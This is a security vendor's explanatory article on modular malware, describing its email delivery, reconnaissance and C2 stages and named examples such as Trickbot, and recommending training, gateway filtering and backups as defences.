Modular malware: A multi-level threat

Whilst not a new threat, modular malware has increasingly become a tool of choice for cybercriminals looking to diversify their attacks. This type of malware, which can launch different types of malicious payloads based on the target, presents a complex security challenge.

Barracuda’s research indicates that the use of modular malware has been on the rise since the beginning of 2019. A recent analysis of email attacks targeting Barracuda customers found more than 150,000 unique malicious files in the first five months of this year.

As such, this evolving threat requires a multi-layered data protection and security strategy that can address both technical and human vulnerabilities to ensure network and data safety.

Multi-purpose cyberattacks in a single package

Modular malware is typically delivered as an email attachment and provides a much more robust, evasive, and effective attack strategy than standard malware. These attacks include a variety of different payloads or plugins that can be installed and launched after the initial attack.

Most malware is distributed as a document attachment that is sent via spam to widely-circulated email lists. These email lists are sold, traded, aggregated, and revised as they move through the dark web.

While the initial email infiltration follows a standard pattern — users are prompted to open or download a suspicious attachment — the attack becomes more complicated over time. After the initial download, only essential components of the malware are installed. That first module acts as a sort-of scout to sniff out the type of network and security system in place, what vulnerabilities are present, and which types of attacks will be most successful.

After performing this reconnaissance under the radar, the first stage of the malware contacts its command and control server (C2), which provides further instructions to more effectively exploit a given network.

Once an infected document is opened, either the malware is automatically installed or a heavily obfuscated macro/script is used to download and install it from an external source. Occasionally, a link or other clickable item is used, but that approach is much more common in phishing attacks than malware attacks.

Modular malware comes in a variety of forms. Plurox is a good example. The malware works as a backdoor Trojan, crypto-miner and self-spreading virus in a single package.

Another Trojan, called CookieMiner, installs a hidden cryptocurrency miner on the target network and can also steal payment or personal data. Trickbot, a banking Trojan, has been updated multiple times so that the malware can now take application data, launch spam, and deliver other types of malware. It also includes a module that was designed to steal cookies.

The fact that a single breach can result in a wide variety of different issues makes modular malware much more difficult to defend against. Since the first module is merely watching or exploring the network, alarms aren’t raised until other attacks have commenced. Often, that’s too late.

With the rise of botnets executing commands provided by cybercriminals and malware written for wide-spread distribution, modularity has become the new norm. Malware authors are increasingly organised and continue to adopt and implement software-industry practices, including quality assurance and testing, to improve the success of attacks. In response to the demand to meet multiple needs with one widely-distributed malware file, modular malware has evolved to become more feature-rich and flexible.

That means companies have to take a multi-pronged approach to detect and defend against modular malware. Those efforts should include:

A significant threat

Training: This is the most critical part of any good security program. End users have to be trained to recognise suspicious emails and to avoid opening attachments from unknown sources. Phishing simulation and training must be part of any security awareness training program. Update that training as new attacks emerge. These simulations can also help identify the most at-risk end users for additional training and education.

Gateway Security: Deploy malware detection, firewalls, sandboxing, and spam filters to provide both inbound and outbound security. Static and dynamic analysis tools can spot emails with malicious attachments that might be trying to download or run an executable. A threat intelligence or heuristics system can flag the URL for that executable. The analysis can also detect any obfuscation techniques such as a suspicious attachment.

While the best line of defence is for employees not to open these emails or attachments, cybercriminals have gotten better at manipulating targets. One of the ways to achieve this is through spam filters and other software that can help block these messages from reaching employee inboxes in the first place. Advanced firewalls can also help shut down these attacks if employees click those links or attachments.

Additionally, artificial intelligence, DMARC validation and other advanced approaches can help spot spear-phishing or different types of high-level attacks that might bypass an email gateway.

Backup: Make sure you have a robust backup and data protection solution in place to help recover any data that might be lost as a result of a modular malware attack. 

Modular ma lware represents a more significant threat than traditional cyberattacks because of its advanced attack strategy. By combining security training and advanced threat protection and security solutions, companies can spot these attacks more quickly and shut them down before they can do significant damage.

Jonathan Tanner, Senior Security Researcher, Barracuda Networks